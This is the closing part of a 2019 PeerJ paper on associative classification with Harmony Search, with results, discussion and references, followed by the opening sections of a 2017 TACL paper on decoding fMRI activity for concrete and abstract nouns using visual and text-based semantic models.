accuracy, CPAR algorithm have the highest accuracy at the five datasets and our proposed method is the best at the seven datasets out of nine datasets. In one dataset, all algorithms are perfect and gain equal accuracy. The CBA algorithm is not the best in none of the datasets and in all of the datasets our proposed method outperformed the CBA algorithm. It must be noted that the results of decision tree, CBA and CPAR algorithms are reproduced on the same partitions. We used the Friedman test (Friedman, 1940) as an appropriate choice for comparing multiple classification algorithms (Brazdil & Soares, 2000; Demšar, 2006). The Friedman test is a non-parametric statistical test developed by Milton Friedman (Friedman, 1937; Friedman, 1940). Similar to the parametric repeated measures ANOVA, it is used to detect differences between groups when the dependent variable being measured is ordinal. It must be noted that classification algorithms are ranked on each of the datasets and then the Friedman test is applied. The last row of Table 3 shows the mean rank for each of the algorithms. As the results show, proposed method gained the best position and CBA has the worst one. The results also shows that there is an overall statistically significant difference between the mean ranks of the related algorithms (P =0.0005). The reported accuracy of other studies may be different in some algorithms from our ones. One of the main reason for this conflict is that we had no information about the Hasanpour et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.188 9/14 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.188 Table 3 Experiment results based on 20 repetitions of 10-fold cross validation. Each row of the table shows the accuracy of applying four rule-based classification algorithm on a dataset. Id dataset Decision tree CBA CPAR Proposed method 1 Iris 91.33 94.6 94.67 96.67 2 Galaxy 68.73 56.66 60.37 61.12 3 Wine 86.52 95.12 94.38 97.19 4 Tictactoe 91.22 80.48 97.39 92.81 5 SAHeart 64.94 66.45 71.21 73.43 6 Car 94.68 73.38 95.78 80.22 7 Breast cancer 92.85 85.69 95.42 96.28 8 Yeast 54.99 52.96 57.61 56.27 9 Balance scale 77.44 72.20 71.36 73.76 10 Lymphography 73.65 57.43 83.11 74.32 11 haberman 71 73 73.84 75.16 12 mammographic 81.08 80.81 81.49 83.20 13 phoneme 85.79 70.65 70.73 77.22 14 pima 71.08 71 64.84 72.01 15 German 73.1 67 71.40 68.7 16 Monks 2 73.61 60.49 80.79 64.58 17 Monk 3 1 1 1 1 Mean Rank 2.55 3.5 2.14 1.79 discretization algorithm, in particularly the number of ranges used to discretize continuous attributes. Using different discretization approaches can result in different outputs. DISCUSSION This research has focused on the application of computational intelligence in association rule mining-based classifiers. Although rule-based classification algorithms have high classification accuracy, but some of them suffer from a critical limitation. They used a heuristic approach for selection a subset of rules for building a classifier. It is obvious that the selected rules may not be the best subset of possible rules. Another challenge of existing algorithms is related to rare class. Using greedy approaches, the resulted rules bias to prevalent classes and classification the rare instances is a major problem. We combined the Apriori, CBA and Harmony Search algorithms in order to build a rule-based classifier that has a high prediction accuracy. We used Apriori algorithm with multiple Minsup for rule generation. Since the number of rules that satisfy Minsup and Minconf conditions is high and considering all subset of rules is not possible, we applied the Harmony Search algorithm for finding the best subset of rules that can be used as a classifier. Harmony Search (HS) is a relatively simple yet very efficient evolutionary algorithm. One of the main sections in every population based algorithms is calculating the cost function. For every solution (subset of selected rules) we applied a modified version of the CBA algorithm on training and validation data and assigned the resulted value to the cost function. The statistical and experimental results of applying the proposed method Hasanpour et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.188 10/14 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.188 on seventeen benchmark dataset demonstrate that our proposed method outperformed famous algorithms such as tree search, CBA and CPAR in general. One of the limitations of the proposed method is that it does not gain proper accuracy in datasets with many class number. Another limitation in our study is that we used accuracy measure for comparing the algorithms. Using measures such as precision and recall better reflects the benefits of the proposed method. Our aim in the future is to tackle these problems. ADDITIONAL INFORMATION AND DECLARATIONS Funding The authors received no funding for this work. Competing Interests The authors declare there are no competing interests. Author Contributions • Hesam Hasanpour conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. • Ramak Ghavamizadeh Meibodi authored or reviewed drafts of the paper, approved the final draft. • Keivan Navi authored or reviewed drafts of the paper, approved the final draft. Data Availability The following information was supplied regarding data availability: This work uses standard benchmark datasets that can be downloaded from the following addresses: https://sci2s.ugr.es/keel/datasets.php; https://archive.ics.uci.edu/ml/index.php. The MATLAB code is available as a Supplemental File. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.188#supplemental-information. REFERENCES Afkhami S, Ma OR, Soleimani A. 2013. A binary Harmony Search algorithm for solving the maximum clique problem. International Journal of Computer Applications 69(12):38–43. Agrawal R, Imieliński T, Swami A. 1993. Mining association rules between sets of items in large databases. In: Proceedings of the 1993 ACM SIGMOD international conference on management of data, Washington DC, 25-28 May 1993. New York: ACM, 207–216 DOI 10.1145/170035.170072. Hasanpour et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.188 11/14 https://peerj.com https://sci2s.ugr.es/keel/datasets.php https://archive.ics.uci.edu/ml/index.php http://dx.doi.org/10.7717/peerj-cs.188#supplemental-information http://dx.doi.org/10.7717/peerj-cs.188#supplemental-information http://dx.doi.org/10.7717/peerj-cs.188#supplemental-information http://dx.doi.org/10.1145/170035.170072 http://dx.doi.org/10.7717/peerj-cs.188 Agrawal R, Mannila H, Srikant R, Toivonen H, Verkamo AI. 1996. Fast discovery of association rules. Advances in Knowledge Discovery and Data Mining 12:307–328. Brazdil PB, Soares C. 2000. A comparison of ranking methods for classification algo- rithm selection. In: European conference on machine learning. Springer, 63–75. Burdick D, Calimlim M, Gehrke J. 2001. Mafia: a maximal frequent itemset algorithm for transactional databases. In: Proceedings of the 17th international conference on data engineering, 2001. Piscataway: IEEE, 443–452. Cano A, Luna JM, Ventura S. 2013. High performance evaluation of evolutionary- mined association rules on GPUs. The Journal of Supercomputing 66:1438–1461 DOI 10.1007/s11227-013-0937-4. Cano A, Zafra A, Ventura S. 2013. An interpretable classification rule mining algorithm. Information Sciences 240:1–20 DOI 10.1016/j.ins.2013.03.038. Cano A, Zafra A, Ventura S. 2014. Parallel evaluation of Pittsburgh rule-based classifiers on GPUs. Neurocomputing 126:45–57 DOI 10.1016/j.neucom.2013.01.049. Chen W-C, Hsu C-C, Hsu J-N. 2012. Adjusting and generalizing CBA algorithm to handling class imbalance. Expert Systems with Applications 39:5907–5919 DOI 10.1016/j.eswa.2011.11.113. Demšar J. 2006. Statistical comparisons of classifiers over multiple data sets. Journal of Machine Learning Research 7:1–30. Friedman M. 1937. The use of ranks to avoid the assumption of normality implicit in the analysis of variance. Journal of the American Statistical Association 32:675–701 DOI 10.1080/01621459.1937.10503522. Friedman M. 1940. A comparison of alternative tests of significance for the problem of m rankings. The Annals of Mathematical Statistics 11:86–92 DOI 10.1214/aoms/1177731944. Geem ZW. 2006. Optimal cost design of water distribution networks using harmony search. Engineering Optimization 38:259–277 DOI 10.1080/03052150500467430. Geem ZW, Kim JH, Loganathan GV. 2001. A new heuristic optimization algorithm: harmony search. Simulation 76:60–68 DOI 10.1177/003754970107600201. Geem ZW, Tseng C-L, Park Y. 2005. Harmony search for generalized orienteering problem: best touring in China. In: International conference on natural computation. Springer, 741–750. Ilayaraja M, Meyyappan T. 2013. Mining medical data to identify frequent diseases using Apriori algorithm. In: Pattern recognition, informatics and mobile engineering (PRIME), 2013 international conference on. Piscataway: IEEE, 194–199. Jovanoski V, Lavrač N. 2001. Classification rule learning with APRIORI-C. In: Portuguese conference on artificial intelligence. Springer, 44–51. Li W, Han J, Pei J. 2001. CMAR: accurate and efficient classification based on multiple class-association rules. In: Data mining, 2001 ICDM 2001, proceedings IEEE interna- tional conference on. Piscataway: IEEE, 369–376. Li J, Shen H, Topor R. 2002. Mining the optimal class association rule set. Knowledge- Based Systems 15:399–405 DOI 10.1016/S0950-7051(02)00024-2. Hasanpour et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.188 12/14 https://peerj.com http://dx.doi.org/10.1007/s11227-013-0937-4 http://dx.doi.org/10.1016/j.ins.2013.03.038 http://dx.doi.org/10.1016/j.neucom.2013.01.049 http://dx.doi.org/10.1016/j.eswa.2011.11.113 http://dx.doi.org/10.1080/01621459.1937.10503522 http://dx.doi.org/10.1214/aoms/1177731944 http://dx.doi.org/10.1080/03052150500467430 http://dx.doi.org/10.1177/003754970107600201 http://dx.doi.org/10.1016/S0950-7051(02)00024-2 http://dx.doi.org/10.7717/peerj-cs.188 Luna JM, Cano A, Pechenizkiy M, Ventura S. 2016. Speeding-up association rule mining with inverted index compression. IEEE Transactions on Cybernetics 46:3059–3072 DOI 10.1109/TCYB.2015.2496175. Ma BLWHY, Liu B. 1998. Integrating classification and association rule mining. In: Proceedings of the fourth international conference on knowledge discovery and data mining. Mazid MM, Ali AS, Tickle KS. 2009. A comparison between rule based and association rule mining algorithms. In: Network and system security, 2009 NSS’09 third interna- tional conference on. Piscataway: IEEE, 452–455. Moh’d Alia O. 2017. Dynamic relocation of mobile base station in wireless sensor networks using a cluster-based harmony search algorithm. Information Sciences 385:76–95. Nahar J, Imam T, Tickle KS, Chen Y-PP. 2013. Association rule mining to detect factors which contribute to heart disease in males and females. Expert Systems with Applications 40:1086–1093 DOI 10.1016/j.eswa.2012.08.028. Nahar J, Tickle KS, Ali AS, Chen Y-PP. 2011. Significant cancer prevention factor extraction: an association rule discovery approach. Journal of Medical Systems 35:353–367 DOI 10.1007/s10916-009-9372-8. Quinlan JR. 1993. C4.5: programs for machine learning. Burlington: Morgan Kauffman. Sarno R, Dewandono RD, Ahmad T, Naufal MF, Sinaga F. 2015. Hybrid association rule learning and process mining for fraud detection. International Journal of Computer Science 42(2):59–72. Scheffer T. 2001a. Finding association rules that trade support optimally against confi- dence. In: European conference on principles of data mining and knowledge discovery. Springer, Berlin, Heidelberg, 424–435. Scheffer T. 2001b. Finding association rules that trade support optimally against confidence. Principles of Data Mining and Knowledge Discovery 424–435 DOI 10.1007/3-540-44794-6_35. Shin AM, Lee IH, Lee GH, Park HJ, Park HS, Yoon KI, Lee JJ, Kim YN. 2010. Diagnostic analysis of patients with essential hypertension using association rule mining. Healthcare Informatics Research 16:77–81 DOI 10.4258/hir.2010.16.2.77. Sun Y, Wong AK, Kamel MS. 2009. Classification of imbalanced data: a review. In- ternational Journal of Pattern Recognition and Artificial Intelligence 23:687–719 DOI 10.1142/S0218001409007326. Thabtah F, Cowling P, Hammoud S. 2006. Improving rule sorting, predictive accuracy and training time in associative classification. Expert Systems with Applications 31:414–426 DOI 10.1016/j.eswa.2005.09.039. Thabtah FA, Cowling P, Peng Y. 2004. MMAC: a new multi-class, multi-label associative classification approach. In: Data mining, 2004 ICDM’04 fourth IEEE international conference on. Piscataway: IEEE, 217–224. Tsai C-J, Lee C-I, Yang W-P. 2008. A discretization algorithm based on class-attribute contingency coefficient. Information Sciences 178:714–731 DOI 10.1016/j.ins.2007.09.004. Hasanpour et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.188 13/14 https://peerj.com http://dx.doi.org/10.1109/TCYB.2015.2496175 http://dx.doi.org/10.1016/j.eswa.2012.08.028 http://dx.doi.org/10.1007/s10916-009-9372-8 http://dx.doi.org/10.1007/3-540-44794-6_35 http://dx.doi.org/10.4258/hir.2010.16.2.77 http://dx.doi.org/10.1142/S0218001409007326 http://dx.doi.org/10.1016/j.eswa.2005.09.039 http://dx.doi.org/10.1016/j.ins.2007.09.004 http://dx.doi.org/10.7717/peerj-cs.188 Wang Y, Wong AKC. 2003. From association to classification: inference using weight of evidence. IEEE Transactions on Knowledge and Data Engineering 15:764–767 DOI 10.1109/TKDE.2003.1198405. Wang K, Zhou S, He Y. 2000. Growing decision trees on support-less association rules. In: Proceedings of the sixth ACM SIGKDD international conference on knowledge discovery and data mining. New York: ACM, 265–269. Yin X, Han J. 2003. CPAR: classification based on predictive association rules. In: Proceedings of the 2003 SIAM international conference on data mining. Philadelphia: SIAM, 331–335. Hasanpour et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.188 14/14 https://peerj.com http://dx.doi.org/10.1109/TKDE.2003.1198405 http://dx.doi.org/10.7717/peerj-cs.188 work_hc4up7ghr5dpre425mbxpgzlk4 ---- Visually Grounded and Textual Semantic Models Differentially Decode Brain Activity Associated with Concrete and Abstract Nouns Andrew J. Anderson Brain & Cognitive Sciences University of Rochester aander41@ur.rochester.edu Douwe Kiela Computer Laboratory University of Cambridge dk427@cam.ac.uk Stephen Clark Computer Laboratory University of Cambridge sc609@cam.ac.uk Massimo Poesio School of Computer Science and Electronic Engineering University of Essex poesio@essex.ac.uk Abstract Important advances have recently been made using computational semantic models to de- code brain activity patterns associated with concepts; however, this work has almost ex- clusively focused on concrete nouns. How well these models extend to decoding abstract nouns is largely unknown. We address this question by applying state-of-the-art compu- tational models to decode functional Magnetic Resonance Imaging (fMRI) activity patterns, elicited by participants reading and imagin- ing a diverse set of both concrete and abstract nouns. One of the models we use is linguistic, exploiting the recent word2vec skipgram ap- proach trained on Wikipedia. The second is visually grounded, using deep convolutional neural networks trained on Google Images. Dual coding theory considers concrete con- cepts to be encoded in the brain both linguisti- cally and visually, and abstract concepts only linguistically. Splitting the fMRI data accord- ing to human concreteness ratings, we indeed observe that both models significantly decode the most concrete nouns; however, accuracy is significantly greater using the text-based mod- els for the most abstract nouns. More gener- ally this confirms that current computational models are sufficiently advanced to assist in investigating the representational structure of abstract concepts in the brain. 1 Introduction Since the work of Mitchell et al. (2008), there has been increasing interest in using computational se- mantic models to interpret neural activity patterns scanned as participants engage in conceptual tasks. This research has almost exclusively focused on brain activity elicited as participants comprehend concrete nouns as experimental stimuli. Different modelling approaches — predominantly distribu- tional semantic models (Mitchell et al., 2008; De- vereux et al., 2010; Murphy et al., 2012; Pereira et al., 2013; Carlson et al., 2014) and semantic mod- els based on human behavioural estimation of con- ceptual features (Palatucci et al., 2009; Sudre et al., 2012; Chang et al., 2010; Bruffaerts et al., 2013; Fernandino et al., 2015) — have elucidated how dif- ferent brain regions contribute to semantic represen- tation of concrete nouns; however, how these results extend to non-concrete nouns is unknown. In computational modelling there has been in- creasing importance attributed to grounding seman- tic models in sensory modalities, e.g., Bruni et al. (2014), Kiela and Bottou (2014). Andrews et al. (2009) demonstrated that multi-modal models formed by combining text-based distributional in- formation with behaviourally generated conceptual properties (as a surrogate for perceptual experience) provide a better proxy for human-like intelligence. However, both the text-based and behaviourally- based components of their model were ultimately derived from linguistic information. Since then, in analyses of brain data, Anderson et al. (2013) have applied multi-modal models incorporating features that are truly grounded in natural image statistics to further support this claim. In addition, Anderson et al. (2015) have demonstrated that visually grounded models describe brain activity associated with inter- nally induced visual features of objects as the ob- 17 Transactions of the Association for Computational Linguistics, vol. 5, pp. 17–30, 2017. Action Editor: Daichi Mochihashi. Submission batch: 2/2016; Revision batch: 7/2016; Published 1/2017. c©2017 Association for Computational Linguistics. Distributed under a CC-BY 4.0 license. jects names are read and comprehended. Having both image- and text-based models of se- mantic representation, and neural activity patterns associated with concrete and abstract nouns, enables a natural test of Dual coding theory (Paivio, 1971). Dual coding posits that concrete concepts are repre- sented in the brain in terms of a visual and linguis- tic code, whereas abstract concepts are only repre- sented by a linguistic code. Whereas previous work has demonstrated that image- and text-based seman- tic models contribute to explaining neural activity patterns associated with concrete nouns, it remains unclear whether either text- or image-based seman- tic models can decode neural activity patterns asso- ciated with abstract words. We extend previous work by applying image- and text-based computational semantic models to de- code an fMRI data set spanning a diverse set of nouns of varying concreteness. The 70-word stim- uli for the fMRI experiment (listed in Table 1) are semantically structured according to taxonomic cat- egories and domains embedded in WordNet (Fell- baum, 1998) and its extensions. Participants read the noun and were instructed to imagine a situation that they personally associate with the noun. In this sense, the data solicited was targetting deep thought patterns (deeper than might be anticipated for rapid semantic processing required in conversations and many real time interactions with the world). In the analysis we split the fMRI data set into the most con- crete and most abstract words based on behavioural concreteness ratings. Our key contribution is in demonstrating a decoding advantage for text-based semantic models over the image-based models when decoding the more abstract nouns. In line with the previous results of Anderson et al. (2013) and An- derson et al. (2015), both visual and textual models decode the more concrete nouns. The image- and text-based computational models we use have recently been developed using neural networks (Mikolov et al., 2013; Jia et al., 2014). The image-based model is built using a deep con- volutional neural network approach, similar in na- ture to those recently used to study neural represen- tations of visual stimuli (see Kriegeskorte (2015), al- though note this is the first application to study word elicited neural activation known to the authors). For decoding we use a recently introduced algorithm (Anderson et al., 2016) that abstracts the decoding task to representational similarity space, and achieve decoding accuracies on par with those convention- ally achieved through discriminating concrete nouns (and higher if we combine data to exploit group- level regularities). Because the fMRI experiments were performed in Italian on native Italians, and because approximately comparable text corpora in content were available in English and Italian (English and Italian Wikipedia), we were able to compare how well English and Ital- ian text-based semantic models can decode neural activity patterns. Whilst Italian Wikipedia could reasonably be expected to be advantaged by sup- porting culturally appropriate nuances of seman- tic structure, it is disadvantaged by being consider- ably smaller than English Wikipedia. Taking inspi- ration from previous work exploiting cross-lingual resources (Richman and Schone, 2008; Shi et al., 2010; Darwish, 2013) we combined Italian and En- glish text-based models in our decoding analyses in an attempt to leverage the benefits of both. Although combined language and English models tended to yield marginally better decoding accura- cies, there were no significant differences between the different language models. Whilst we expect se- mantic structure on a grand scale to broadly straddle language boundaries for most concrete and abstract concepts (albeit with cultural specificities), this is proof of principle that cross linguistic commonali- ties are reflected in neural activity patterns measur- able with current technology. 2 Brain Data We reanalyze the fMRI data originally collected by Anderson et al. (2014), who investigated the rel- evance of different taxonomic categories and do- mains embedded in WordNet to the organization of conceptual knowledge in the brain. 2.1 Word stimuli Anderson et al. (2014) systematically selected a list of 70 words intended to be representative of a broad range of abstract and concrete nouns. These were organised according to the domains of law and music, cross-classified with seven taxonomic cate- gories. They began by identifying low-concreteness 18 LAW MUSIC Ur-abstracts giustizia justice musica music liberta’ liberty blues blues legge law jazz jazz corruzione corruption canto singing refurtiva loot punk punk Attribute giurisdizione jurisdiction sonorita’ sonority cittadinanza citizenship ritmo rhythm impunita’ impunity melodia melody legalita’ legality tonality’ tonality illegalita illegality intonazione pitch Communication divieto prohibition canzone song verdetto verdict pentagramma stave ordinanza decree ballata ballad addebito accusation ritornello refrain ingiunzione injunction sinfonia symphony Event/action arresto arrest concerto concert processo trial recital recital reato crime assolo solo furto theft festival festival assoluzione acquital spettacolo show Person/Social-role giudice judge musicista musician ladro thief cantante singer imputato defendant compositore composer testimone witness chitarrista guitarist avvocato lawyer tenore tenor Location tribunale court/tribunal palco stage carcere prison auditorium auditorium questura police-station discoteca disco penitenziario penitentiary conservatorio conservatory patibolo gallows teatro theatre Object/Tool manette handcuffs violino violin toga robe tamburo drum manganello truncheon tromba trumpet cappio noose metronomo metronome grimaldello skeleton-key radio radio Table 1: Italian stimulus words and English translations, divided into law and music domains (columns), and taxo- nomic categories (groups of 5 rows). The most concrete half of the words are indicated in bold font. Strike-throughs indicate words for which we did not have semantic model coverage. words in the norms of Barca et al. (2002). They then linked these to WordNet to identify the taxonomic category of the dominant sense of each word. Six taxonomic categories that were heavily populated with abstract words, as well as one unambiguously concrete category, were chosen. All categories sup- ported ample coverage of Law and Music domains (determined according to WordNet Domains (Ben- tivogli et al., 2004)). Five law words and five music words were selected from each taxonomic category. Taxonomic categories and example stimulus words (translated into English) are as below: Ur-abstract: Anderson et al.’s term for concepts that are classified as abstract in WordNet but do not belong to a clear subcategory, e.g., law or music. At- tribute: A construct whereby objects or individuals can be distinguished, e.g., legality, tonality. Com- munication: Something that is communicated by, to or between groups, e.g., accusation, symphony. Event/action: Something that happens at a given place and time, e.g., crime, festival. Person/Social- role: Individual, someone, somebody, mortal, e.g., judge, musician. Location: Points or extents in space, e.g., court, theatre. Object/Tool: A class of unambiguously concrete nouns, e.g., handcuffs, vio- lin. The full list of stimuli is in Table 1. We split the stimulus nouns into the 35 most concrete and 35 most abstract words according to the behavioural concreteness ratings from Anderson et al. (2014). 19 2.2 fMRI Experiment Participants Nine right-handed native Italian speakers aged between 19 and 38 years (3 women) were recruited to take part in the study. Two were scanned after Anderson et al. (2014) to match the number of participants analysed by Mitchell et al. (2008). Scanning had previously been halted at 7 in- stead of the planned 9 participants for a period due to equipment failure. All had normal or corrected- to-normal vision. The 70 stimulus words were presented as written words, in 5 runs (all runs were collected in one par- ticipant visit), with the order of presentations ran- domised across runs. In each run, a randomly se- lected word was presented every 10 seconds, and re- mained on screen for 3 seconds. On reading a stim- ulus word, participants thought of a situation that they individually associated with the noun. This pro- cess is similar to previous concrete noun tasks, e.g., Mitchell et al. (2008), where participants were in- structed to think of the properties of the noun. How- ever, as people encounter difficulties eliciting prop- erties of non-concrete concepts, compared to think- ing of situations in which concepts played a role (Wiemer-Hastings and Xu, 2005), the experimental paradigm was adapted to imagining situations. fMRI acquisition and preprocessing Anderson et al. (2014) recorded fMRI images on a 4T Bruker MedSpec MRI scanner. They used an Echo Planar Imaging (EPI) pulse sequence with a 1000 msec rep- etition time, an echo time of 33 msec, and a 26◦ flip angle. A 64×64 acquisition matrix was used, and 17 slices were imaged with a between-slice gap of 1 mm. Voxels had dimensions of 3mm×3mm×5mm. fMRI data were corrected for head motion, un- warped, and spatially normalized to the Montreal Neurological Institute and Hospital (MNI) template. Only voxels estimated to be grey matter were in- cluded in the subsequent analysis. For each partic- ipant, for each scanning run (where a run is a com- plete presentation of 70 words), voxel activity was corrected by removing linear trend and transformed to z scores (within each run). Each stimulus word was represented as a single volume by taking the voxel-wise mean of the 4 sec of data offset by 4 sec from the stimulus onset (to account for hemo- dynamic response). Voxel selection The 500 most stable grey mat- ter voxels per participant were selected for analy- sis. This was undertaken within the leave-2-word- out decoding procedure detailed later in Section 4 using the same method as Mitchell et al. (2008): Pearson’s correlation of each voxel’s activity be- tween matched word lists in all scanning run pairs (10 unique run pairs giving 10 correlation coeffi- cients of 68/70 words, where the other 2 words were test words to be decoded) was computed. The mean coefficient was used as stability measure. Voxels as- sociated with the 500 largest stability measures were selected. 3 Semantic Models 3.1 Image-based semantic models Following previous work in multi-modal semantics (Bergsma and Van Durme, 2011; Kiela et al., 2014), we obtain a total of 20 images for each of the stim- ulus words from Google Images1. Images from Google have been shown to yield representations that are competitive in quality compared to alterna- tive resources (Bergsma and Van Durme, 2011; Fer- gus et al., 2005). Image representations are obtained by extracting the pre-softmax layer from a forward pass in a convolutional neural network (CNN) that has been trained on the ImageNet classification task using Caffe (Jia et al., 2014). This approach is simi- lar to e.g., Kriegeskorte (2015), except that we only use the pre-softmax layer, which has been found to work particularly well in semantic tasks (Razavian et al., 2014; Kiela and Bottou, 2014). Such CNN- derived image representations have been found to be of higher quality than traditional bag of visual words models (Sivic and Zisserman, 2003) that were pre- viously used in multi-modal semantics (Bruni et al., 2014; Kiela and Bottou, 2014). We aggregate im- ages associated with a stimulus word into an overall visually grounded representation by taking the mean of the individual image representations. Image search for abstract nouns The validity and success of the following analyses are depen- dent on having built the image-based models from a set of images that are indeed relevant to the ab- stract words. The Google Image searches we used 1www.google.com/imghp 20 Figure 1: Representing brain and semantic model vectors in similarity space. to build the image-based models largely returned a selection of images systematically associated with our most abstract nouns. For instance, ‘corruption’ returns suited figures covertly exchanging money; ‘law’, ‘justice’, ‘music’, ‘tonality’ return pictures of gavels, weighing scales, musical notes and cir- cles of fifths, respectively. For ‘jurisdiction’, the image search returns maps and law-related objects. However, there were also misleading cases such as ‘pitch’ where the image search, whilst returning po- tentially useful pictures of sinusoidal graphs, was heavily contaminated by images of football pitches. This problem is not exclusive to images, and the cur- rent text-based models are also not immune to the multiple senses of polysemous words. 3.2 Text-based semantic models For linguistic input, we use the continuous vec- tor representations from the skip-gram model of Mikolov et al. (2013). Specifically, we obtained 300-dimensional word embeddings by training a skip-gram model using negative sampling on recent Italian and English Wikipedia dumps (using Gensim with preprocessing from word2vec’s demo script). For English, representations were built for the En- glish translations of the 70 stimuli provided by An- derson et al. (2014). The English model was trained for 1 iteration, whereas the Italian was trained for 5, since the Italian Wikipedia dump was smaller (5.2 vs 1.3 billion words respectively). Following previous work exploiting cross-lingual textual resources (Richman and Schone, 2008; Shi et al., 2010; Darwish, 2013), we also applied Ital- ian and English text-based models in combination. Model combination was achieved at the analysis stage, by fusing decoding outputs of Italian and En- glish models as described in Section 4.1. 4 Representational similarity-based decoding of brain activity We decoded word-level fMRI representations using the semantic models following the procedure intro- duced by Anderson et al. (2016). The process of matching models to words is abstracted to represen- tational similarity space: For both models and brain data, words are semantically re-represented by their similarities to other words by correlating all word pairs within the native model or brain space, using Pearson’s correlation (see Figure 1). The result is two square matrices of word pair correlations: one for the fMRI data, another for the model. In the similarity space, each word is a vector of correla- tions with all other words, thereby allowing model and brain words (similarity vectors) to be directly matched to each other. In decoding, models were matched to fMRI data as follows (see Figure 2). Two test words were cho- sen. The 500 voxels estimated to have the most stable signal were selected using the strategy de- scribed in Section 2.2. Voxel selection was based on the fMRI data of the other 68/70 words. Se- lection on 68/70 rather than all 70 words was to allay any concern that voxel selection could have 21 systematically biased the fMRI correlation structure (calculated next) to look like that of the semantic model, and consequently biased decoding perfor- mance. However, as similarity-based decoding does not optimise a mapping between fMRI data and se- mantic model, it is not prone to modelling and de- coding fMRI noise as in classic cases of double dip- ping (Kriegeskorte et al., 2009). Indeed, as we report later in this section, there were no significant differ- ences in decoding accuracy arising from tests using voxel selection on 68/70 versus 70 words. A single representation of each word was built by taking the voxel-wise mean of all five presentations of the word for the 500 selected voxels. An fMRI similarity matrix for all 70 words was then calcu- lated. Similarity vectors for the two test words were drawn from both the model and fMRI similarity ma- trices. Entries corresponding to the two test words in both model and fMRI similarity vectors were re- moved because these values could reveal the correct answer to decoding. The two model similarity vec- tors were then compared to the two fMRI similar- ity vectors by correlation, resulting in four corre- lation values. These correlation values were trans- formed using Fisher’s r to z (arctanh). If the sum of z-transformed correlations between the correctly matched pair exceeded the sum of correlations for the incongruent pair, decoding was scored a success, otherwise a failure. This process was then repeated for all word pairs, with the mean accuracy of all test iterations giving a final measure of success. Fisher’s r to z transform (arctanh) is typically used to test for differences between correlation coeffi- cients. It transforms the correlation coefficient r to a value z, where z has amplified values at the tails of the correlation coefficient (r otherwise ranges be- tween -1 and 1). This is to make the sampling distri- bution of z normally distributed, with approximately constant variance values across the population corre- lation coefficient. In the similarity-decoding method used here, z is evaluated in decoding because it is a more principled metric to compare and combine (as later undertaken in Section 4.1) However, under most circumstances r to z is not critical to the procedure. z noticeably differs from r only when correlations exceed .5, and r to z changes decoding behaviour in select circumstances. Specif- ically r to z can influence how word labels are as- Figure 2: Similarity-decoding algorithm (adapted from Anderson et al. 2016). 22 signed to similarity vectors by upweighting high value correlation coefficients at the final stage of de- coding. A hypothetical scenario to illustrate the above point is as follows. Let Pearson(X,Y) denote Pear- son’s correlation of vectors X and Y, and brainA cor- respond to a brain similarity vector “A” for an un- known word label, and model1 to a semantic model similarity vector for a known word label “1”. In the final stage of analysis, there are two decoding alter- natives given by (i) Pearson(brainA,model2)=.9 and Pearson(brainB,model1)=.9, which when summed gives 1.8; (ii) Pearson(brainA,model1)=.89, Pear- son(brainB,model2)=.91. Here the sum is also 1.8 and therefore (i) and (ii) are identical. Applying the r to z transform would result in selection of (ii) because arctanh(.9)+arctanh(.9)=2.94, whereas arc- tanh(.89)+arctanh(.91)=2.95. Statistical significance of decoding accuracy was determined by permutation testing. Decoding was repeated multiple times using the following proce- dure: creating a vector of word-label indices and randomly shuffling these indices; applying the vec- tor of shuffled indices to reorder both rows and columns of only one of the similarity matrices (whilst keeping the original correct row/column la- bels so that word-labels now mismatch matrix con- tents); and repeating the entire pair-matching decod- ing procedure described above. If word labels are randomly assigned to similarity vectors, we expect a chance-level decoding accuracy of 50%. Repeti- tion of this process (here 10,000 repeats) supplies a null distribution of decoding accuracies achieved by chance. The p-value of decoding accuracy is calcu- lated as the proportion of chance accuracies that are greater than or equal to the observed decoding accu- racy. For permutation testing only, voxel selection was undertaken a single time, per participant, on all 70 words (rather than on 68/70 words in each leave-2- out decoding iteration). This was to reduce com- putation time that would otherwise have been pro- hibitive. This is very unlikely to have yielded any discernible difference in outcome. Unlike de- coding strategies, that involve fitting a classifica- tion/encoding model to fMRI data (and are prone to fitting and subsequently decoding fMRI noise), similarity-based decoding does not learn a mapping between semantic-model and fMRI data and is ro- bust to “double dipping” giving spurious decoding accuracies (see Kriegeskorte et al. (2009) for prob- lems associated with double dipping). As an empirical demonstration, we reran all of our 21 actual (non-permuted) model-based de- coding analyses, that are reported later in Sec- tion 5.2, whilst selecting voxels from all 70 words (as opposed to leave-2-out voxel-selection on 68/70 words). Specifically, decoding analyses were re- peated for all 7 model combinations, and tested first on all words, then for the most concrete words only, and finally the most abstract words only. Mean de- coding accuracies for the 9 participants yielded with and without leave-2-out voxel selection were com- pared using paired t-tests. There were no significant differences across all 21 tests. The most different (non-significant) individual result was t=1.87, p=.09 (2-tailed), and in this case leave-2-out voxel selec- tion gave the higher accuracy. 4.1 Model combination by ensemble averaging To test whether the three different semantic mod- els (image-based, Italian/English text-based) carried complementary information, we combined the mod- els in evaluation, thus allowing us to test whether accuracies achieved using model combinations were higher than those achieved with isolated models. To combine the different models, we used an en- semble averaging strategy and ran the similarity- based decoding analyses as described above in par- allel with each of the three semantic models. At each leave-2-out test iteration, this gave three arc- tanh transformed 2*2 correlation matrices (one for each semantic model) that were used to evaluate de- coding. Model combination was achieved by fusing the respective arctanh transformed correlation ma- trices by summing them together. Evaluation of the resulting 2×2 summation matrix proceeded as previ- ously by first summing the two congruent values on the main-diagonal of the matrix, then summing the two incongruent scores on the counter-diagonal. If the congruent sum was greater than the incongruent sum, decoding was a success, otherwise a failure. 23 5 Results We split the stimulus nouns into the 35 most con- crete and 35 most abstract words according to the behavioural concreteness ratings from Anderson et al. (2014), and ran analyses on all words combined and these two subsets. Due to limitations in word coverage of the semantic models, ‘melody’ was missing from the abstract words, and ‘skeleton-key’ and ‘police-station’ were missing from the most concrete words (hence 67/70 words were analysed). 5.1 Hypotheses Dual coding theory 